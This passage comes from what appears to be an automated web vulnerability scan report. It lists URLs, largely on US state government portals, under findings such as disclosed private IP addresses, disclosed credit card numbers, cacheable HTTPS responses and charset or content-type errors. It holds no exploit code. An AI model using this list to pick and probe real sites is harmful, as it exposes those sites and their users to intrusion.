22.234. https://www.vermontjoblink.com/ada/global/images/error.gif

22.235. https://www.vermontjoblink.com/ada/global/images/kswksbgd.gif

22.236. https://www.vermontjoblink.com/ada/global/images/printericonA.png

22.237. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/AJS.js

22.238. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/cookiesupport.js

22.239. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/googiespell.js

22.240. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css

22.241. https://www.vermontjoblink.com/ada/leavesite.cfm

22.242. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm

22.243. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

22.244. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm

22.245. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm

22.246. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm

22.247. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm

22.248. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

22.249. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm

22.250. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm

22.251. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm

22.252. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm

22.253. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm

22.254. https://www.vermontjoblink.com/ada/works/FAQ.cfm

22.255. https://www.vermontjoblink.com/ada/works/Login.cfm

22.256. https://www.vermontjoblink.com/ada/works/contactus.cfm

22.257. https://www.vermontjoblink.com/ada/works/employeroverview.cfm

22.258. https://www.vermontjoblink.com/ada/works/joboverview.cfm

22.259. https://www.vermontjoblink.com/ada/works/jobsearch.cfm

22.260. https://www.vermontjoblink.com/ada/works/linkview.cfm

22.261. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm

22.262. https://www.vermontjoblink.com/favicon.ico

22.263. http://www.vsea.org/join-your-union

23. Private IP addresses disclosed

23.1. http://digg.com/submit

23.2. http://facebook.com/sharer.php

23.3. http://home.mcafee.com/

23.4. http://home.mcafee.com/AdviceCenter/Default.aspx

23.5. http://home.mcafee.com/Default.aspx

23.6. http://home.mcafee.com/Default.aspx

23.7. http://www.ag.ny.gov/

23.8. http://www.archives.gov/shop/

23.9. http://www.archives.gov/veterans/evetrecs/index.html

23.10. http://www.archives.gov/veterans/military-service-records/

23.11. http://www.facebook.com/TeamHaslam

23.12. http://www.facebook.com/WSDOL

23.13. http://www.facebook.com/campaign/landing.php

23.14. http://www.facebook.com/note.php

23.15. http://www.facebook.com/ohiodivisionofwatercraft

23.16. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845

23.17. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387

23.18. http://www.facebook.com/pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680

23.19. http://www.facebook.com/photo.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.facebook.com/plugins/like.php

23.22. http://www.facebook.com/share.php

23.23. http://www.facebook.com/video/video.php

23.24. http://www.google.com/sdch/rU20-FBA.dct

23.25. https://www.humanservices.state.pa.us/compass.web/MenuItems/GeneralInfoFaq.aspx

23.26. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

23.27. http://www.ncesc.com/lmi/default.asp

24. Credit card numbers disclosed

24.1. http://data.ok.gov/views/INLINE/rows.json

24.2. http://maps.google.com/maps/sf

24.3. http://www.portal.state.pa.us/portal/server.pt/document/852822/10-06-30_2010-11_gf_tr__web_version_pdf

25. Robots.txt file

25.1. http://in.gov/core/js/arss.css

25.2. http://mi.gov/

25.3. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif

25.4. http://www.governor.nh.gov/

25.5. http://www.nh.gov/

25.6. http://www.vsea.org/

26. Cacheable HTTPS response

26.1. https://app.mobilestorm.com/cp/manageforms/preview.php

26.2. https://apps.tn.gov/biztax-app/login.html

26.3. https://apps.tn.gov/biztax/

26.4. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

26.5. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf

26.6. https://bugzilla.mozilla.org/show_bug.cgi

26.7. https://dotax.ehawaii.gov/efile/css/stylesheet.css

26.8. https://dotax.ehawaii.gov/efile/user

26.9. https://dotax.ehawaii.gov/favicon.ico

26.10. https://fortress.wa.gov/dol/dolprod/dsdoffices/

26.11. https://fortress.wa.gov/dol/dolprod/vehoffices/

26.12. https://geonic.cdc.nicusa.com/geoserver/wms

26.13. https://georgiawildlife.dnr.state.ga.us/service/login1.asp

26.14. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm

26.15. https://license.ohio.gov/lookup/default.asp

26.16. https://maps-api-ssl.google.com/maps

26.17. https://mibid.bidcorp.com/Login.aspx

26.18. https://myalaska.state.ak.us/

26.19. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl

26.20. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/training.pl

26.21. https://nhlicenses2.nh.gov/favicon.ico

26.22. https://nhlicenses2.nh.gov/professional/

26.23. https://onestop.michigan.gov/favicon.ico

26.24. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonEnabled.png

26.25. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonHover.png

26.26. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

26.27. https://rts.texasonline.state.tx.us/NASApp/txdotrts/RegistrationRenewalServlet

26.28. https://seal.verisign.com/getseal

26.29. https://secure.kentucky.gov/portal/login.aspx

26.30. https://secure.missingkids.com/missingkids/servlet/CybertipServlet

26.31. https://secure.utah.gov/rex/

26.32. https://secure.utah.gov/rex/index.html

26.33. https://treas-secure.treas.state.mi.us/eservice_enu/

26.34. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe

26.35. https://web.globalpay.com/taxpayer/default.asp

26.36. https://www.accesskansas.org/businesscenter/index.html

26.37. https://www.accesskansas.org/dissolutions/index.do

26.38. https://www.accesskansas.org/favicon.ico

26.39. https://www.alabamainteractive.org/abc_license/

26.40. https://www.alabamainteractive.org/abc_license/content/common/styleSheet.jsp

26.41. https://www.bbb.org/online/consumer/cks.aspx

26.42. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf

26.43. https://www.compasssmartshopper.com/WebResource.axd

26.44. https://www.compasssmartshopper.com/default.aspx

26.45. https://www.compasssmartshopper.com/passwordrecovery.aspx

26.46. https://www.ehawaii.gov/efile/

26.47. https://www.ehawaii.gov/efile/js/jquery-1.2.6.min.js

26.48. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc

26.49. https://www.insightexpressai.com/adServer/adServer.aspx

26.50. https://www.ncourt.com/forms/DE/navigation.aspx

26.51. https://www.tennesseeanytime.org/biztax/

26.52. https://www.tennesseeanytime.org/favicon.ico

26.53. https://www.tennesseeanytime.org/includes/alert/alert.shtml

26.54. https://www.tennesseeanytime.org/pmnout/notice/listByMonth

26.55. https://www.vermontjoblink.com/ada/404/404_qry.cfm

26.56. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm

26.57. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm

26.58. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css

26.59. https://www.vermontjoblink.com/ada/leavesite.cfm

26.60. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm

26.61. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

26.62. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm

26.63. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm

26.64. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm

26.65. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm

26.66. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm

26.67. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm

26.68. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm

26.69. https://www.vermontjoblink.com/ada/works/FAQ.cfm

26.70. https://www.vermontjoblink.com/ada/works/Login.cfm

26.71. https://www.vermontjoblink.com/ada/works/contactus.cfm

26.72. https://www.vermontjoblink.com/ada/works/employeroverview.cfm

26.73. https://www.vermontjoblink.com/ada/works/joboverview.cfm

26.74. https://www.vermontjoblink.com/ada/works/jobsearch.cfm

26.75. https://www.vermontjoblink.com/ada/works/linkview.cfm

26.76. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm

26.77. https://www.vitalchek.com/AjaxFAQServer.aspx

26.78. https://www.vitalchek.com/AjaxOrderStepServer.aspx

26.79. https://www.vitalchek.com/order_step_js.aspx

27. Multiple content types specified

27.1. http://data.ok.gov/packages/shared-table-editor.js

27.2. http://phonebook.iowa.gov/scripts/tiny_mce/tiny_mce.js

28. HTML does not specify charset

28.1. http://admin.state.nh.us/hr/

28.2. http://admin.state.nh.us/hr/retirement_benefits.html

28.3. http://al.gov/

28.4. http://business.ohio.gov/inc/print.css

28.5. http://cityofmuscleshoals.com/Default.asp

28.6. http://data.gosquared.com/favicon.ico

28.7. http://emergency.louisiana.gov/

28.8. http://fls.doubleclick.net/activityi

28.9. http://ilsapp.lib.de.us/uhtbin/cgisirsi/x/x/0/5

28.10. http://in.gov/core/index_pages/quicklinks.html

28.11. http://jqueryui.com/themeroller/

28.12. http://ky.gov/

28.13. http://la.gov/phpincludes/weathergraphic.php

28.14. http://legis.delaware.gov/Lookup/ContactInfo_Home

28.15. http://legis.delaware.gov/Lookup/Divisions_Home

28.16. http://legis.delaware.gov/Lookup/GeneralInfo_Home

28.17. http://legis.delaware.gov/Lookup/House_Home

28.18. http://legis.delaware.gov/Lookup/Meetings_Home

28.19. http://legis.delaware.gov/Lookup/OnlinePub_Home

28.20. http://legis.delaware.gov/Lookup/SenateHome

28.21. http://legis.delaware.gov/Lookup/copyright

28.22. http://legis.delaware.gov/Lookup/disclaimer

28.23. http://legis.delaware.gov/Lookup/faq

28.24. http://legis.delaware.gov/Lookup/permissions

28.25. http://legis.delaware.gov/images/spacer.gif

28.26. http://legis.state.la.us/

28.27. http://legis.state.la.us/contact.htm

28.28. http://legis.state.la.us/index.htm

28.29. http://legis.state.la.us/main.asp

28.30. https://license.ohio.gov/lookup/default.asp

28.31. http://mi.gov/iit

28.32. http://mi.gov/unemployment

28.33. https://myalaska.state.ak.us/

28.34. http://ncchildcaresearch.dhhs.state.nc.us/search.asp

28.35. http://ok.gov/

28.36. https://onestop.michigan.gov/OneStop/a

28.37. https://onestop.michigan.gov/css/none

28.38. https://onestop.michigan.gov/images/imgBanBG.gif

28.39. https://onestop.michigan.gov/onestop-main/OneStop/a

28.40. https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do

28.41. http://orangoo.com/AmiNation/AJS

28.42. http://pa.gov/

28.43. https://portal.s4web.state.mn.us/favicon.ico

28.44. http://public.leginfo.state.ny.us/menugetf.cgi

28.45. http://services.ito.state.il.us/agencycomponents/getBPFeatures.cfm

28.46. http://tools.google.com/service/update2

28.47. https://treas-secure.treas.state.mi.us/eservice_enu/

28.48. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

28.49. http://view.atdmt.com/iaction/kgakog_General_1/v3/ato./[atc1.1215451620/atc2.false/atc3.landing%20page:visit%20florida]

28.50. https://web.globalpay.com/taxpayer/default.asp

28.51. http://www.alabama.gov/portal/common/feedback.jsp

28.52. http://www.alabama.gov/sliverheader/Welcome.do

28.53. https://www.alabamainteractive.org/abc_license/

28.54. https://www.alabamainteractive.org/arecmenu/welcome.action

28.55. http://www.ct.gov/ctportal/assets/templates/62/css/print.css

28.56. http://www.ct.gov/ctportal/cwp/a

28.57. http://www.ct.gov/favicon.ico

28.58. http://www.dot.state.tx.us/txdoteforms/GetForm

28.59. http://www.dyve.net/jquery/

28.60. http://www.georgia.gov/favicon.ico

28.61. http://www.hoosierdata.in.gov/nav.asp

28.62. http://www.in.gov/sliverheader/Welcome.do

28.63. http://www.labor.vermont.gov/sections/wfd/training/wiatrain/index.cfm

28.64. http://www.legis.louisiana.gov/boards/board_members.asp

28.65. http://www.legis.state.la.us/billdata/bytype.asp

28.66. http://www.legis.state.la.us/puls_main.htm

28.67. http://www.missingkids.com/cybertip/

28.68. http://www.nccourts.org/Citizens/GoToCourt/Default.asp

28.69. http://www.nccourts.org/Forms/FormSearchResults.asp

28.70. http://www.nccourts.org/Support/FAQs/FAQs.asp

28.71. http://www.nhfishandgame.com/

28.72. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi

28.73. http://www.nhfishandgame.com/nh/

28.74. https://www.paybill.com/payccu/

28.75. http://www.sled.state.sc.us/sled/default.asp

28.76. http://www.state.nj.us/cgi-bin/corrections/njnewsline/view_article.pl

28.77. http://www.sus.edu/CatSubCat/CatSubCat.asp

28.78. http://www.txdot.gov/txdoteforms/GetForm

28.79. https://www.vitalchek.com/order_step_js.aspx

28.80. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp

29. HTML uses unrecognised charset

30. Content type incorrectly stated

30.1. http://api.flickr.com/services/rest/

30.2. https://app.mobilestorm.com/cp/manageforms/preview.php

30.3. http://data.gosquared.com/info

30.4. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.000009872950613498688/blur

30.5. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.001998334191739559/blur

30.6. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.0026780031621456146/blur

30.7. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.011548380833119154/blur

30.8. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.01971346652135253/blur

30.9. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.022341948002576828/blur

30.10. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.02552951965481043/blur

30.11. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.04267080337740481/blur

30.12. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.04323508660309017/blur

30.13. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.044262538431212306/blur

30.14. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.060621748911216855/blur

30.15. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.06715349410660565/blur

30.16. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.07685435866005719/blur

30.17. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.09363480005413294/blur

30.18. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.10315419943071902/blur

30.19. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.11289626965299249/blur

30.20. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.11589423776604235/blur

30.21. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.12988923490047455/blur

30.22. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.13738619000650942/blur

30.23. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.138584119733423/blur

30.24. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1699286277871579/blur

30.25. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17060571792535484/blur

30.26. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17085690842941403/blur

30.27. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17398039577528834/blur

30.28. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1774560243356973/blur

30.29. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.18011080077849329/blur

30.30. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.18388619902543724/blur

30.31. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1858982944395393/blur

30.32. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.19640426943078637/blur

30.33. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.19923278456553817/blur

30.34. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.20630339859053493/blur

30.35. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.24649194884113967/blur

30.36. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2514170885551721/blur

30.37. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2516566349659115/blur

30.38. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2637447805609554/blur

30.39. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.28566303313709795/blur

30.40. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2876860585529357/blur

30.41. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3019666268955916/blur

30.42. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.30537568125873804/blur

30.43. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3157538343220949/blur

30.44. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3249114565551281/blur

30.45. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.33584522688761353/blur

30.46. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3467109438497573/blur

30.47. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3481709277257323/blur

30.48. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3624314337503165/blur

30.49. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.38390326127409935/blur

30.50. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.38600696669891477/blur

30.51. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.40151602448895574/blur

30.52. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4050266451667994/blur

30.53. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4068455633241683/blur

30.54. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4138688885141164/blur

30.55. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.41853372333571315/blur

30.56. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.429519847035408/blur

30.57. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4363963413052261/blur

30.58. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.44046534434892237/blur

30.59. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4425783231854439/blur

30.60. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4540047354530543/blur

30.61. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.45804641279391944/blur

30.62. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.49180271849036217/blur

30.63. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.500924386549741/blur

30.64. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5069206766784191/blur

30.65. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5099691387731582/blur

30.66. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5208840556442738/blur

30.67. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5211261368822306/blur

30.68. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5360172654036433/blur

30.69. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5386203117668629/blur

30.70. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5455857384949923/blur

30.71. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5471443922724575/blur

30.72. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5550143918953836/blur

30.73. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5863302680663764/blur

30.74. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.594650394981727/blur

30.75. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5956144810188562/blur

30.76. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6021819114685059/blur

30.77. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6179129627998918/blur

30.78. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6373290235642344/blur

30.79. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6486031790263951/blur

30.80. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6607160025741905/blur

30.81. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6617095449473709/blur

30.82. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6921457799617201/blur

30.83. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6926347883418202/blur

30.84. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6938011264428496/blur

30.85. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7019346773158759/blur

30.86. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.715909109916538/blur

30.87. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7213846454396844/blur

30.88. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7216604244895279/blur

30.89. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7247910390142351/blur

30.90. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7289540111087263/blur

30.91. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7393709721509367/blur

30.92. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7429176256991923/blur

30.93. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7457810698542744/blur

30.94. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7577714030630887/blur

30.95. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7647813553921878/blur

30.96. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.771832418628037/blur

30.97. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7730976778548211/blur

30.98. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7768238643184304/blur

30.99. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7811430096626282/blur

30.100. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7813084367662668/blur

30.101. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7839354085735977/blur

30.102. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7843597154133022/blur

30.103. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7869180392008275/blur

30.104. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7918125691358/blur

30.105. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8042216831818223/blur

30.106. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8088590698316693/blur

30.107. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8120218790136278/blur

30.108. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8208005137275904/blur

30.109. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8334101843647659/blur

30.110. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8426639721728861/blur

30.111. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8459921134635806/blur

30.112. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8527416458819062/blur

30.113. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8612566720694304/blur

30.114. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.888174522202462/blur

30.115. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8932765168137848/blur

30.116. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9015116489026695/blur

30.117. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9020833417307585/blur

30.118. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9022978853899986/blur

30.119. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9131813035346568/blur

30.120. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9280000494327396/blur

30.121. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9323878902941942/blur

30.122. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9361629660706967/blur

30.123. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9456879969220608/blur

30.124. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9502052108291537/blur

30.125. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9559315296355635/blur

30.126. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9581880448386073/blur

30.127. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9663452641107142/blur

30.128. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.968449151609093/blur

30.129. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9736038320697844/blur

30.130. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9872054078150541/blur

30.131. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9883057198021561/blur

30.132. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.07331018731929362/blur

30.133. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.12472099298611283/blur

30.134. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.18714607320725918/blur

30.135. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.1872362329158932/blur

30.136. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.2141191172413528/blur

30.137. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.21521809720434248/blur

30.138. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.21795565215870738/blur

30.139. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.22715646773576736/blur

30.140. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.23163565923459828/blur

30.141. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.30029481556266546/blur

30.142. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.33089457359164953/blur

30.143. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.3843667053151876/blur

30.144. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.41453591943718493/blur

30.145. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.4250001448672265/blur

30.146. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.4458236221689731/blur

30.147. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.49288138072006404/blur

30.148. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5206995762418956/blur

30.149. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5421753553673625/blur

30.150. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5555199990049005/blur

30.151. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.6276831564027816/blur

30.152. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.6466669554356486/blur

30.153. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7472825900185853/blur

30.154. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7475871213246137/blur

30.155. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7839805490802974/blur

30.156. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.811701592290774/blur

30.157. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8338523292914033/blur

30.158. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8455094299279153/blur

30.159. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8464667112566531/blur

30.160. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.870363011257723/blur

30.161. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8804292443674058/blur

30.162. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.884554136544466/blur

30.163. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.9358769238460809/blur

30.164. http://data.ok.gov/views.json

30.165. http://data.osbm.state.nc.us/pls/linc/dyn_linc_main.show

30.166. http://de.gov/images/favicon.ico

30.167. http://doa.alaska.gov/dmv/scripts/style.css

30.168. https://dotax.ehawaii.gov/efile/css/stylesheet.css

30.169. https://dotax.ehawaii.gov/favicon.ico

30.170. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp

30.171. http://feeds.feedburner.com/~s/kansasgovwhatsnew

30.172. http://ga.gov/gta/images/webpage/link_icon.gif

30.173. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_878.aspx

30.174. http://johncarney.house.gov/profiles/house/themes/house/images/favicon.ico

30.175. http://kdkgllry.netmng.com/

30.176. http://kentucky.gov/_layouts/Authenticate.aspx

30.177. http://kodakgallery-kg.baynote.net/baynote/tags3/common

